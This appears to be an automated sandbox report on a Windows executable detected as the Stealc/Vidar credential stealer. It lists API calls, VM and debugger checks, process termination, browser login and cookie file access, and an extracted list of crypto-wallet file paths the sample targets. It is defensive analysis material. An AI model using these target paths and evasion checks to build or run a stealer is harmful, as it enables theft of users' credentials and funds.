Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00418060 GetSystemInfo,wsprintfA,

0_2_00418060

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.27.dr	Binary or memory string: VMware
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: JJJJKEHC.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: JJJJKEHC.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: JJJJKEHC.0.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: JJJJKEHC.0.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarem7
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231x
Source: JJJJKEHC.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: JJJJKEHC.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JJJJKEHC.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: JJJJKEHC.0.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8RECOVE~11c3bankoRecoveryImprovedVMware20,11696492231x
Source: Amcache.hve.27.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: JJJJKEHC.0.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.27.dr	Binary or memory string: vmci.sys
Source: JJJJKEHC.0.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: JJJJKEHC.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: JJJJKEHC.0.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: JJJJKEHC.0.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.27.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.27.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.27.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.27.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JJJJKEHC.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.27.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.27.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.27.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: JJJJKEHC.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.27.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.27.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: JJJJKEHC.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: JJJJKEHC.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.27.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.27.dr	Binary or memory string: VMware Virtual USB Mouse
Source: JJJJKEHC.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.27.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.27.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.27.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.27.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.27.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000000D.00000003.1428561016.0000152802514000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: JJJJKEHC.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: JJJJKEHC.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.27.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.27.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000000D.00000002.1507160818.000001D4FA843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: JJJJKEHC.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: JJJJKEHC.0.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: Amcache.hve.27.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.27.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: JJJJKEHC.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.27.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.27.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: JJJJKEHC.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: JJJJKEHC.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83742
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83731
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-84906
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83728
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83749
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83750
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83570
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	API call chain: ExitProcess graph end node	graph_0-83771

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

0_2_00404610

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041B058

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0040A090

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]

0_2_00419AA0

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041B058
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0041D21A SetUnhandledExceptionFilter,	0_2_0041D21A
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B63A
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE7B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CE7B66C
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE7B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CE7B1F7
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D04AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D04AC62

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: HrxOpVxK5d.exe PID: 6396, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_004198E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00419790

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_6CE7B341 cpuid

0_2_6CE7B341

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417D20

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00418CF0 GetSystemTime,

0_2_00418CF0

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004179E0

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417BC0

Source: Amcache.hve.27.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HrxOpVxK5d.exe.49e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.4900e67.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.4900e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HrxOpVxK5d.exe.49e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HrxOpVxK5d.exe PID: 6396, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: HrxOpVxK5d.exe PID: 6396, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\.5
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\ElectronCash\wallets\\.
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\.5
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json"
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.json8
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.json8
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.json8
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\.K
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
